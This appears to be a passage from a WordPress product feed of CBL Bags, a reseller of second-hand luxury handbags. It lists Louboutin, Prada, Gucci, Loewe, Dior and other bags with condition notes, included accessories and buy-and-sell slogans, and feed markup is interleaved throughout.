This delightful Christian Louboutin Paloma Small Crazy Love is for those who love to be different. Crafted in multicolor print leather with silver tone hardware, three-tone spikes and bright red interior. It can be hand-worn, on the shoulder or crossbody. In very good condition,and includes dustbag, strap and invoice.

La entrada Christian Louboutin Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-6/ Fri, 20 Dec 2019 12:13:06 +0000 https://www.cblbags.com/?post_type=product&p=31784 This Valentino Glam Lock crafted in black & red leather with micro-beaded details will be the perfect companion on your gala evenings!

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
IT’S TIME TO RENEW YOUR WARDROBE! WE BUY YOUR LUXURY BAGS.

This striking Glam Lock bag from Valentino is crafted from black & red leather with gold tone hardware and is adorned with micro beaded details. It is a shoulder/crossbody bag that features a front flap with the iconic Rockstud details, a push-lock closure and a chain link strap. In spite of its small size you can easily fit your wallet and cell phone.- It is in very good condition except for very slight marks on the back leather and two soft marks  in the interior.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Christian Louboutin Bag https://www.cblbags.com/en/p/christian-louboutin-bag/ Tue, 17 Dec 2019 15:12:45 +0000 https://www.cblbags.com/?post_type=product&p=31653 Louboutin gives this Paloma Medium Bag holiday colors in fuchsia, bright red and beige. It can be hand worn, on the shoulder or crossbody.

La entrada Christian Louboutin Bag se publicó primero en CBL Bags.

]]>
IF YOU WANT TO RENEW YOUR WARDROBE, WE BUY SECOND-HAND LUXURY BAGS

This lovely Christian Louboutin Paloma Medium is crafted in fuchsia color calfskin with red lining, beige handles, silver hardware and three-tone spikes. It can be  hand worn, on the shoulder or crossbody. It is in good condition, except for very slight scuff marks on corners, handles and side plastic. Includes dustbag, strap and invoice.

La entrada Christian Louboutin Bag se publicó primero en CBL Bags.

]]>
Prada bag https://www.cblbags.com/en/p/prada-bag-8/ Mon, 16 Dec 2019 18:13:20 +0000 https://www.cblbags.com/?post_type=product&p=31572 This Prada Wallet-On-Chain, crafted in black velvet with gold tone hardware is ideal for your gala evenings!

La entrada Prada bag se publicó primero en CBL Bags.

]]>
 

DO YOU WANT TO RENEW YOUR WARDROBE? WE BUY LUXURY SECOND-HAND BAGS

This Prada black velvet WOC is a wonderful choice for the Season’s evening events. Crafted in velvet with gold tone hardware. It can be worn as a clutch, on the shoulder or crossbody.- In very good condition except for slight wear on exterior velvet borders.- Includes box, authenticity card and care booklet.

La entrada Prada bag se publicó primero en CBL Bags.

]]>
GUCCI Bag https://www.cblbags.com/en/p/gucci-bag-10/ Wed, 27 Nov 2019 16:08:46 +0000 https://www.cblbags.com/?post_type=product&p=31238 For those who love tradition, this Gucci Jackie O Hobo is a classic of the House.

La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
IF YOU WANT TO SELL YOUR LUXURY BAGS, CONTACT US.

This Gucci Jackie O Hobo is a classic of the House. Easy to wear, with good capacity for your essentials, it is crafted in tan calfskin with gold tone hardware. In very good condition.

La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-7/ Fri, 22 Nov 2019 18:03:02 +0000 https://www.cblbags.com/?post_type=product&p=31098 ThisPrada Nylon Hibiscus is perfect for your everyday city errands. In spite of its compact size it has plenty of room for your essentials.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
DO YOU WANT TO SELL YOUR LUXURY BAGS? CONTACT US

This lightweight Prada Nylon Bag is crafted in a vibrant Hibiscus shocking pink. It’s a practical crossbody wear thanks to its cloth strap. It has plenty of room for all your essentials. In good condition except for a visible stain in the interior and slight wear marks on corners. Includes cloth strap, tassle, identification card, barcode card, tirette with key ring.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Bulgari Shopper https://www.cblbags.com/en/p/bulgari-shopper/ Fri, 22 Nov 2019 16:57:13 +0000 https://www.cblbags.com/?post_type=product&p=31085 The Bulgari seal of elegance is evident in this Topkapi Red Limited Edition Shopper. Crafted in the finest silk and brown leather handles. In excellent condition.

La entrada Bulgari Shopper se publicó primero en CBL Bags.

]]>
WE BUY AND SELL LUXURY SECOND HAND BAGS

The undisputed Bulgari  elegance is evident in this Topkapi Red Limited Edition Shopper. Crafted in the finest multicolor silk print and brown leather handles. It is in very good condition, like new. Includes box , maintenance booklet, barcode card.

La entrada Bulgari Shopper se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-10/ Fri, 22 Nov 2019 12:39:23 +0000 https://www.cblbags.com/?post_type=product&p=31054 Lovely Loewe Special Edition bag crafted in calfskin, perforated exterior in petal design. Comes with all its accessories and is in very good condition, new.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
AT CBL BAGS WE ARE EXPERT IN APPRAISALS OF THE LUXURY BAGS YOU WANT TO SELL

This lovely Loewe Amazon is a Special Edition crafted in the softest cream color calfskin with a perforated flower design on the exterior, rose color trims and gold-tone hardware. In excellent condition, never worn.-  Includes box, dustbag, leather certificate, bar code card, maintenance booklet, tirette, clochette, lock and keys.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-9/ Tue, 19 Nov 2019 14:24:05 +0000 https://www.cblbags.com/?post_type=product&p=30842 This Loewe Amazon 42 bag is ideal for your documents or laptop. Crafted in mustard color calfskin with gold tone hardware and is easy to wear due to its long canvas strap.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL LUXURY BAGS. EXPERT APPRAISALS.

This Loewe Amazona 42 is crafted in mustard color calfskin with gold tone hardware. It has the perfect size for your documents or laptop and can be used crossbody thanks to its large canvas strap. It is in very good condition except for slight wear marks in corners and exterior leather and handle. Includes crossbody canvas strap, dustbag and materials card.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Dior handbag https://www.cblbags.com/en/p/dior-handbag/ Fri, 15 Nov 2019 13:16:57 +0000 https://www.cblbags.com/?post_type=product&p=30700 This magnificent Dior 30 Montaigne Oblique reproduces the classic blue and grey canvas Dior anagram, but its design is completely new and belongs to the 2019 collection.

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
SI QUIERES RENOVAR TU GUARDAROPA, COMPRAMOS TUS BOLSOS DE LUJO

This Dior 30 Montaigne Oblique belongs to the 2019 collection. Crafted in the iconic Dior anagram canvas in blue and grey tones, its trims are in navy blue calfskin and the hardware is gold-tone. 30 Montaigne is embossed in the back and it comes with an adjustable strap so that it can be worn on the shoulder or crossbody. Includes dustbag. In excellent condition, new.

 

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-6/ Thu, 14 Nov 2019 12:19:34 +0000 https://www.cblbags.com/?post_type=product&p=30585 This classic and at the same time trendy black Prada Galleria  with gold hardware is in excellent condition, new. A  bag for all seasons!

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
This Prada Small Galleria bag is crafted of superb Saffiano Lux black leather with gold hardware.  It presents double handles and includes a removable and adjustable strap to wear cross-body. The bag is divided in three compartments; side ones close with a top zipper. In addition, the base features protective studs and the sides of the bag can be extended thanks to a push lock clasp. It is in excellent condition, new. Includes dustbag, shoulder strap, classic Prada chain, tirette with key ring  and authenticity card.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-8/ Tue, 12 Nov 2019 17:43:47 +0000 https://www.cblbags.com/?post_type=product&p=30424 Light and practical, this Loewe Lazo Bucket Bag has excellent capacity and can be worn by hand or crossbody. Part of the Spring '19 collection, it is crafted in soft calfskin.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
At CBL Bags we buy and sell luxury second hand bags. Expert appraisals.

 

This stunning Loewe Lazo Bucket Bag is crafted in grey smooth calfskin and tan boxcalf leather. It was presented in the collection Spring ’19.  Can be carried crossbody or by hand. It has one interior pocket.  Includes dustbag, certificate, mini book and leather maintenance book, and is in very good condition.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-5/ Fri, 04 Oct 2019 11:24:02 +0000 https://www.cblbags.com/?post_type=product&p=29783

The amazing Saffiano leather joins the "Amaris" and "Came" colors in this classic-lines bag that yet offers a trendy touch. It is in very good condition. A must in your dressing room!!

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
This Prada bag is crafted of superb Saffiano Lux leather. This model has a rigid shape in “Amaris” and “Came” colors, two different pink colors. It shows double short handle and includes a removable and adjustable strap to wear it cross-body. The bag is divided in three compartments: the main one in the centre is a tote; side ones close with a top zipper. In addition, the base features protective studs and the sides of the bag can be extended thanks to a push lock clasp. It is in very good condition, it doesn’t have wear marks. Includes dustbag, shoulder strap, name tag and authenticity card.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Yves Saint Laurent https://www.cblbags.com/en/p/yves-saint-laurent/ Mon, 30 Sep 2019 16:00:58 +0000 https://www.cblbags.com/?post_type=product&p=29578 This  Yves Saint Laurent ZipTop Pouch/Tech Case is for the modern executive who considers elegance a plus factor. It is crafted in black leather and palladium hardware and is perfect for keeping your laptop or important documents well protected. In excellent condition. Has never been worn.

La entrada Yves Saint Laurent se publicó primero en CBL Bags.

]]>
This YSL Zip Top Pouch/Tech Case is crafted in exquisite black leather with palladium hardware and is ideal for the Exec who believes in style and traditional elegance. Perfect size as a case for your laptop or to keep documents. It has a spacious interior with large slide pocket and slip card holders.  Includes dustbag as in very good condition. Never worn.

La entrada Yves Saint Laurent se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-7/ Mon, 09 Sep 2019 18:13:21 +0000 https://www.cblbags.com/?post_type=product&p=29428 If you're looking for a bag with a compact size and roomy interior for all your essentials, this Loewe Amazona 28 is for you! It is crafted in camel color suede with brown leather trims and gold-tone hardware. It's ideal for your everyday city wear.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
If you want to buy or sell luxury second-hand bags, contact us at CBL bags. Expert appraisals.

This Loewe Amazona 28 crafted in camel color suede with brown leather trims and gold tone hardware is the perfect companion for your everyday city wear. It combines a compact size with a roomy interior  for all your essentials. Includes dustbag, material card and reference card. It is in very good condition, save for very slight wear marks on suede and leather.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Gucci pochette https://www.cblbags.com/en/p/gucci-pochette/ Mon, 09 Sep 2019 16:38:33 +0000 https://www.cblbags.com/?post_type=product&p=29418 This Gucci Mini Pochette Bumble Bee has a compact size but with enough interior space for your essentials. In very good condition. It's a must-have for your early morning errands! Don't miss out on this opportunity!

La entrada Gucci pochette se publicó primero en CBL Bags.

]]>
At CBL Bags we sell and buy luxury second-hand bags. Authenticity guaranteed. Contact us!

This Gucci Mini Pochette Bumble Bee is crafted in beige canvas with the iconic doble GG and complemented with gold-tone hardware and white leather. it also comes with a Bumble Bee charm. It’s a small but practical bag with enough interior space for your essentials. A must-have for running those early morning errands. It is in very good condition and comes with dustbag and  paper bag.

La entrada Gucci pochette se publicó primero en CBL Bags.

]]>
GUCCI Bag https://www.cblbags.com/en/p/gucci-monogram-studded-pelham-runway-flap/ Fri, 05 Jul 2019 15:24:50 +0000 https://www.cblbags.com/?post_type=product&p=28663 Stylish and elegant this Gucci Monogram Studded Pelham Runway Flap, belongs to the  2006 collection. It has a iconic triband shoulderstrap in green and red colors with brown leather trimmings and gold hardware. In very good condition, without wear marks.

La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
In CBL Bags we are experts in buying and selling luxury bags like this beautiful Gucci Studded Pelham Runway Flap. Elegant and stylish and crafted in the classic GG sand color canvas, this model has leather ornaments and aged gold hardware. The shoulder strap presents the iconic green and red triband with gold details. The interior is  lined in  brown canvas with a zip closure pocket.  Includes dustbag and is  in very good condition, without wear marks.


La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
Gucci Sukey GG https://www.cblbags.com/en/p/gucci-sukey-gg/ Fri, 28 Jun 2019 12:43:15 +0000 https://www.cblbags.com/?post_type=product&p=28429 This Gucci Sukey GG is a classic of the brand. It is crafted in sand color canvas printed with the GG monogram. Its spacious capacity is ideal for both city and travel. In very good condition and comes with dustbag.

La entrada Gucci Sukey GG se publicó primero en CBL Bags.

]]>
In CBL Bags we buy and sell luxury second-hand bags like this Gucci Sukey GG crafted in beige monogram canvas printed with the GG logo. Very practical and spacious, it’s a Gucci all-purpose classic with an informal allure. It presents double taupe color leather handles, a small flap with magnetic button for closure and a zip interior pocket. It includes dustbag and is in very good condition.

La entrada Gucci Sukey GG se publicó primero en CBL Bags.

]]>
Gucci bag https://www.cblbags.com/en/p/gucci-marrakesh-bag/ Fri, 28 Jun 2019 12:32:19 +0000 https://www.cblbags.com/p/gucci-marrakesh-bag/ This lovely and practical Gucci Marrakesh bag is crafted in the classic double GG camel color canvas and leather. It's versatile and spacious capacity makes it an  ideal city or travel bag.

La entrada Gucci bag se publicó primero en CBL Bags.

]]>
CBL Bags  buys and sells luxury bags like this lovely Gucci Marrakesh bag. It is crafted in the brand’s classic canvas in camel color. The front flap has a border crafted in woven leather and  the model comes with two tassels and gold tone hardware. It has an adjustable shoulder strap and pressure button as closure. Its spacious interior has three separate compartments and two pockets. It is in very good condition, and only presents soft wear marks in corners. Includes dustbag and two tassels.

La entrada Gucci bag se publicó primero en CBL Bags.

]]>
GUCCI Bag https://www.cblbags.com/en/p/gucci-bamboo/ Fri, 28 Jun 2019 12:29:52 +0000 https://www.cblbags.com/?post_type=product&p=28405 This Gucci, model Bamboo can be worn by hand and crossbody. Its handle, closure and tassels are crafted in bamboo which gives it a very sophisticated allure. Includes long strap and dustbag. Its exterior is in very good condition but has several stains in its interior.

La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
We buy and sell luxury bags

This medium size, black calfskin Gucci Bamboo can also be worn crossbody thanks to its long leather strap. Its bamboo handle, closure and tassel bases gives it a unique and sophisticated appearance. It opens to a light grey interior with excellent capacity due to its acordeon-designed base. Its exterior is in very good condition but has several ink stains in its interior.  Includes dustbag and crossbody strap.

La entrada GUCCI Bag se publicó primero en CBL Bags.

]]>
Yves Saint Laurent https://www.cblbags.com/en/p/yves-saint-laurent-mini-kate-bag/ Fri, 28 Jun 2019 12:22:54 +0000 https://www.cblbags.com/?post_type=product&p=28340 This YSL Mini Kate bag is ideal for day and night wear. Crafted in exquisite beige grained leather with gold tone hardware and chain. It is in very good condition and includes dustbag.



La entrada Yves Saint Laurent se publicó primero en CBL Bags.

]]>
In CBL Bags we are experts in buying and selling luxury bags.

This wonderful beige YSL Mini Kate  bag  is crafted in grained, soft calfskin. It has a rigid flap with the brand in gold tone hardware.  Its chain has the perfect length to wear by hand, shoulder or crossbody. Ideal day and night wear. It has a magnetic closure and its interior is  made in black gogrén with a mini pocket. It is in very good condition, except for light scratches on closure and light wear marks on corners, includes dustbag.


La entrada Yves Saint Laurent se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-amazona/ Fri, 28 Jun 2019 12:17:21 +0000 https://www.cblbags.com/?post_type=product&p=28451 Forever Loewe, its Amazona model is a classic, this time crafted in exquisite black leather. It is in impeccable condition and comes with box, dustbag, lock, keys, tirette, clochette and invoice. a must-have for every woman.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
CBL Bags buys and sells luxury second-hand bags like this classic Loewe Amazona bag crafted in exquisite black leather and palladium hardware, perfect for every occasion. Loewe’s Amazona was born 40 years ago and continues to be a trend-setter. It presents comfortable handles crafted in rolled leather and a biz zipper closure that opens to a spacious interior with several interior pockets. It is in impeccable condition and comes with box, dustbag, lock, keys, clochette, tirette and invoice.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Louis Vuitton Agenda https://www.cblbags.com/en/p/louis-vuitton-agenda-card-holder/ Fri, 28 Jun 2019 12:13:38 +0000 https://www.cblbags.com/?post_type=product&p=28380 This lovely Louis Vuitton Agenda crafted in brown Damier canvas has a practical and compact size with ample space for your credit cards. Includes dustbag and box. Keep your planning activities in style!

La entrada Louis Vuitton Agenda se publicó primero en CBL Bags.

]]>
In CBL Bags we are experts in buying and selling second-hand luxury bags like this lovely Louis Vuitton Agenda. It is crafted in brown Damier canvas with gold tone hardware. Its mocca color interior has six rings separated in groups of three and has ample space for your credit cards. It is personalized with the initials J.P. Even though it contains the 2007 agenda, you can easily keep it up to date by acquiring the annual refills. It is in very good condition and comes with dustbag and original box.

La entrada Louis Vuitton Agenda se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-amazona-suede-leather/ Mon, 06 May 2019 09:50:41 +0000 https://www.cblbags.com/?post_type=product&p=27958 The Amazona bag, created by the Spanish house Loewe, is flexible, light and functional and is designed to be worn at any time and in any place.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Buy Loewe bag

In CBL Bags we are dedicated to buying and selling luxury handbags like this Amazona by Loewe. This elegant bag is made in an exquisite combination of cream suede and dark brown leather, with the characteristic flexibility of the Loewe skin. The hardware is plated in gold and consists of leather reinforcements in the corners in tune with the borders and handles. Its four metal feet protect the base of the bag and give it stability. The top zip opens to a spacious interior that shows the reverse of the main material and has a flat pocket with zipper. This Amazona bag by Loewe became an icon of women’s independence and freedom due to its great capacity, flexibility and durability.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe Wallet https://www.cblbags.com/en/p/loewe-wallet-amazona-cream/ Mon, 06 May 2019 09:39:35 +0000 https://www.cblbags.com/?post_type=product&p=27963 The design with the iconic anagram is a striking feature of this great distinctive wallet. Basic but elegant, this practical wallet combines with any type of clothing, from casual pants to your favorite dress.

La entrada Loewe Wallet se publicó primero en CBL Bags.

]]>
Buy luxury accessories

In CBL Bags we are dedicated to the purchase and sale of handbags and accessories of luxury brands such as Loewe. This wallet of the Spanish house is made with a soft nappa completed with calfskin. The wallet has a zipper closure that opens to a spacious internal wallet composed of three open pockets, eight card slots and a zippered purse. The wallet is beautifully crafted in cream with brown leather details bordering the silhouette and a zipper with polished gold-tone hardware and the brand logo on the front that makes the design striking.

La entrada Loewe Wallet se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-amazona-cream-brown/ Mon, 29 Apr 2019 09:13:58 +0000 https://www.cblbags.com/?post_type=product&p=27945 This Amazona bag from the Spanish house Loewe stands out for its square shape, making it more spacious so you can carry all your things with elegance.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Buy and sell luxury handbags

In CBL Bags we are dedicated to buying and selling handbags from luxury brands such as Loewe. This Amazon bag, is made in suede cream color combined with gold-plated hardware and details in calf leather tone. It has four metal feet to protect the base, and double handle to carry comfortably in the hand. Its top zipper gives rise to a spacious interior that shows the reverse of the main material and has a flat pocket with zipper.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-black/ Fri, 26 Apr 2019 14:56:49 +0000 https://www.cblbags.com/?post_type=product&p=27921 The classic Loewe Amazona bag in black is a perfect bag for all occasions.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Buy Loewe bag

Icon among icons, Loewe’s Amazona bag was born 40 years ago and continues to dominate fashion. This model in black color is made of suede and classic calfskin with leather reinforcement on the corners, protective rivets on the base and silver hardware. The double zipper at the top opens to a spacious interior with a practical zippered pocket. This bag includes padlock, keys, clochette and tirette.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Bulgari bag https://www.cblbags.com/en/p/bulgari-bag-2erpenti-forever-belt-bag/ Fri, 29 Mar 2019 11:28:33 +0000 https://www.cblbags.com/?post_type=product&p=27878 This elegant Bulgari belt bag can be also worn in the shoulder thanks to the removable shoulder strap, to give a sophisticated touch to your urban looks.

La entrada Bulgari bag se publicó primero en CBL Bags.

]]>
Buy sale of luxury accessories

In CBL Bags we are specialized in buying and selling second-hand luxury handbags and accessories. This belt bag from Bulgari’s Serpenti Forever collection is crafted in soft quilted black nappa leather, featuring a distinctive chevron motif. The  snakehead closure in light gold plated brass is enameled in matte black and white and refined with black onyx eyes. The adjustable (75-105 cm.; 29.5-41.3) and removable belt and the detachable chain in light gold plated brass ensure a versatile wearability. Small size with two zipped compartments and an inside pocket.

La entrada Bulgari bag se publicó primero en CBL Bags.

]]>
Carolina Herrera Clutch https://www.cblbags.com/en/p/carolina-herrera-clutch/ Wed, 27 Mar 2019 10:34:19 +0000 https://www.cblbags.com/?post_type=product&p=27799 This elegant Clutch in black crystals and structure in gold chiaro, inspired in the Metropolitan Opera's arches, was created to celebrate the firm´s 35th anniversary. It's a Must for Carolina Herrera fans.

La entrada Carolina Herrera Clutch se publicó primero en CBL Bags.

]]>
Purchase of luxury accessories 

At CBL Bags, we specialize in buying and selling second-hand luxury handbags and accessories. This Carolina Herrera Clutch in the form of a bracelet was created to celebrate the firm’s 35th anniversary and  was inspired by the Metropolitan Opera’s arches. Its exclusive design in black crystals, pressure snap and structure in gold chiaro and is entirely hand-made. It is in perfect condition.

La entrada Carolina Herrera Clutch se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-man/ Thu, 14 Feb 2019 17:44:40 +0000 https://www.cblbags.com/?post_type=product&p=27127 The classic Amazona bag by Loewe in its men's version is elegant as well as practical.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Purchase luxury bags Amazona Loewe

This Loewe Amazona bag is a special design for men. It is made with the highest quality leather that characterizes the Loewe house. It consists of two rolled leather handles to be carried by hand and is opened at the top by a large zipper. In its large interior we find a zipper pocket, an open pocket and another with snap button closure. The colors blue ocean and black are very elegant and masculine. An ideal bag for men who want to be fashionable.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Fendi Handbag https://www.cblbags.com/en/p/fendi-handbag-chashmere/ Tue, 12 Feb 2019 18:35:43 +0000 https://www.cblbags.com/p/fendi-handbag-chashmere/ This classis bag from Fendi is marvelous in all its styles.

La entrada Fendi Handbag se publicó primero en CBL Bags.

]]>
Buy Fendi handbag

At CBL Bags we buy and sell second hand bags as this Fendi bag. This Baguette is crafted of beige cashmere embellished with brown pony hair appliques and silver-tone hardware. It features an adjustable strap for a perfect shoulder carry and a front flap that gives access to a matching-tone interior that features a zippered flat pocket.

La entrada Fendi Handbag se publicó primero en CBL Bags.

]]>
Marmont Gucci Backpack https://www.cblbags.com/en/p/marmont-gucci-backpack/ Thu, 31 Jan 2019 12:13:06 +0000 https://www.cblbags.com/?post_type=product&p=27049 Showing a lightly structured shape, this Gucci backpack is the ideal bag to carry wherever you go!

La entrada Marmont Gucci Backpack se publicó primero en CBL Bags.

]]>
Buy and sell luxury bags Gucci Marmont

This Gucci backpack is crafted of black leather with the characteristic Marmont quilted pattern and the double G ornament on the front. It features two adjustable straps for a perfect back carry and a top handle. Its double zipper opens to a microfiber lined interior that features three flat pockets. Light and roomy, this Gucci backpack is, without doubt, a luxury bag perfect to combine any casual outfit.

La entrada Marmont Gucci Backpack se publicó primero en CBL Bags.

]]>
Dior handbag https://www.cblbags.com/en/p/dior-black-cannage-quilted-leather-satchel/ Wed, 09 Jan 2019 19:04:44 +0000 https://www.cblbags.com/p/dior-black-cannage-quilted-leather-satchel/ Its Cannage quilted pattern says it all...This Dior handbag is perfect to use every day in the city.

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
Buy and sell Dior handbags

At CBL Bags we buy and sell second hand luxury bags like this Dior handbag. It is crafted of black Cannage quilted leather combined with patent details and gold-tone hardware. It features a double handle and open pockets on each side for an easy access. A top zip opens to a black lined interior with plenty of space and flat pockets.

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
Gucci Shoulder bag https://www.cblbags.com/en/p/gucci-dragon-limited-edition-shoulder-bag/ Wed, 09 Jan 2019 10:47:43 +0000 https://www.cblbags.com/p/gucci-dragon-limited-edition-shoulder-bag/ Amazing Gucci Limited Edition designed by Tom Ford

La entrada Gucci Shoulder bag se publicó primero en CBL Bags.

]]>
Second hand luxury bags

At CBL Bags you can find luxury second hand bags like this Dragon bag from Gucci. This handbag is crafted of the classic Gucci monogrammed canvas combined with purple metallic leather and gold-tone hardware. It features a partial front flap that closes with a magnetic clasp and shows a stunning appliqué of dragon heads crafted of metal and Swarovski crystals. The interior of this Gucci bag is lined on a matching-tone fabric and features a flat pocket ideal for small objects. This marvelous Gucci limited edition is in a very good condition and includes dustbag and a small brochure.

La entrada Gucci Shoulder bag se publicó primero en CBL Bags.

]]>
Giorgio Armani bag https://www.cblbags.com/en/p/giorgio-armani-bag-clutch-crocodile-skin/ Fri, 04 Jan 2019 16:10:07 +0000 https://www.cblbags.com/?post_type=product&p=26562 The design of this Giorgio Armani clutch bag in crocodile skin is ideal for an elegant look or to add a touch of glamour to an informal outfit.

La entrada Giorgio Armani bag se publicó primero en CBL Bags.

]]>
Luxury handbags sale

In CBL Bags we are dedicated to the purchase and sale of luxury handbags like this clutch from Giorgio Armani. This Giorgio Armani handbag is made of brown crocodile leather. The front flap opens to an interior lined in brown fabric. The interior consists of a flat open pocket on the front and a zippered pocket on the back. This Giorgio Armani bag is a luxury model to wear day and night with a distinctive elegance.

La entrada Giorgio Armani bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-calf-leather-black/ Fri, 28 Dec 2018 17:10:35 +0000 https://www.cblbags.com/?post_type=product&p=26225 This Prada bag, durable and spacious, has the ability to keep all your daily essentials and more. Wear it across the body with its shoulder strap or on the arm with its short handles for a sophisticated look. It is the perfect bag for daily use!

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Buy Prada bag

In CBL Bags we are dedicated to buy and sell luxury handbags like this Prada bag. This Prada classic bag is made of soft calfskin leather and gold plated hardware. It has a double leather handle and includes a long removable shoulder strap to carry the bag across the body. The bag is divided into three compartments, the main in the center with clasp closure and two other on the sides with zipper closure. The main compartment consists of two zippered pockets lined with monogram canvas and three open pockets lined in red leather. The interior of the two side compartments are made of monogram canvas and black leather. This classic handbag shows the Prada logo on the front side, crafted of leather and gold-tone hardware. Includes authenticity card, strap and unifier.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Christian Dior Bag https://www.cblbags.com/en/p/christian-dior-bag-double-saddle-bowler-marron/ Thu, 27 Dec 2018 18:07:32 +0000 https://www.cblbags.com/?post_type=product&p=26334 This model of the house Dior, presents a nice neutral color and a size that make it a bag designed to carry all day long.

La entrada Christian Dior Bag se publicó primero en CBL Bags.

]]>
Purchase luxury bags

At CBL Bags we are experts in buying and selling luxury bags from brands such as Christian Dior. This Dior Double Saddle Bowler bag is made of brown leather combined with gold hardware. This Christian Dior bag features top rolled leather handles and a double symmetrical front pocket with a cross strap.
The top zipper opens into a fabric interior with five pockets on the inside walls for better organization of your belongings. It also has an open back pocket perfect for easy access to whatever you need to have at hand. This is a wonderful Christian Dior bag ideal for everyday use!

La entrada Christian Dior Bag se publicó primero en CBL Bags.

]]>
Christian Dior Bag https://www.cblbags.com/en/p/christian-dior-bag-baudrier-saddle-leather-suede/ Thu, 27 Dec 2018 17:50:09 +0000 https://www.cblbags.com/?post_type=product&p=26366 This Christian Dior Baudrier Saddle handbag comes from Dior's S/S 2002 collection and is an equestrian gaucho style messenger bag, iconic in the house with a fabulous design hard to find.

La entrada Christian Dior Bag se publicó primero en CBL Bags.

]]>
Buy luxury handbags

In CBL Bags we are dedicated to buying and selling luxury handbags like this Christian Dior Baudrier Saddle bag. This Christian Dior bag is crafted of brown and beige leather and suede with antique bronze fittings. It has an adjustable shoulder strap with details with Christian Dior acronyms. On the exterior of the frontal flap, with embossed leather details, has a single pocket with zip and flap closure folding. A large front flap with magnetic closure opens to the main compartment that is lined in fabric with the Dior monogram and includes an inner zipped pocket. A vintage piece by Christian Dior hard to find!

La entrada Christian Dior Bag se publicó primero en CBL Bags.

]]>
Bottega Veneta Bag https://www.cblbags.com/en/p/bottega-veneta-bagga-veneta-bag-baby-olimpia-intrecciato-nappa-blue/ Fri, 21 Dec 2018 12:54:36 +0000 https://www.cblbags.com/?post_type=product&p=25475 A lightweight bag, ideal to carry your daily essentials with a casual look.

La entrada Bottega Veneta Bag se publicó primero en CBL Bags.

]]>
The compact version of the Olimpia bag by Bottega Veneta is made entirely in soft Nappa Intrecciato , characteristic of the firm. It combines its stone blue color with the hardware in aged gold tone. A long chain with a leather pad allows it to be worn on the shoulder or crossed, making it a practical and elegant design. It has a front flap that closes with a magnetic closure and gives access to an open interior with three compartments. Includes a matching mirror.

La entrada Bottega Veneta Bag se publicó primero en CBL Bags.

]]>
Dior Handbag https://www.cblbags.com/en/p/dior-ultradior-blue-pebbled-leather-handbag/ Mon, 29 Oct 2018 18:50:12 +0000 https://www.cblbags.com/p/dior-ultradior-blue-pebbled-leather-handbag/ Thanks to its design and size, this Dior bag is an everyday essential.

La entrada Dior Handbag se publicó primero en CBL Bags.

]]>
Combining elegance and practicality, this UltraDior bag is crafted of pebbled leather stitched with the classic Dior pattern. Super comfortable especially when you carry it on your shoulder, thanks to its handle leather pads. A top partially hidden pocket opens to a roomy interior, perfect for all the essentials. The final touch is given by the distinguished Dior charm hanging on its front.

La entrada Dior Handbag se publicó primero en CBL Bags.

]]>
Gucci handbag https://www.cblbags.com/en/p/gucci-soho-small-pebbled-black-leather-disco-bag/ Thu, 11 Oct 2018 17:42:50 +0000 https://www.cblbags.com/?post_type=product&p=24882 A classic style with the perfect size to carry all your daily essentials.

La entrada Gucci handbag se publicó primero en CBL Bags.

]]>
This Soho small Disco bag is crafted of gained black calfskin leather and light gold-toned hardware. It shows the famous interlocked GG embossed on the front and a cute leather tassel zipper pull. A top zipper closure opens to a cotton linen lined interior that features phone and open pockets. An adjustable strap allows a shoulder or cross-body carry.

La entrada Gucci handbag se publicó primero en CBL Bags.

]]>
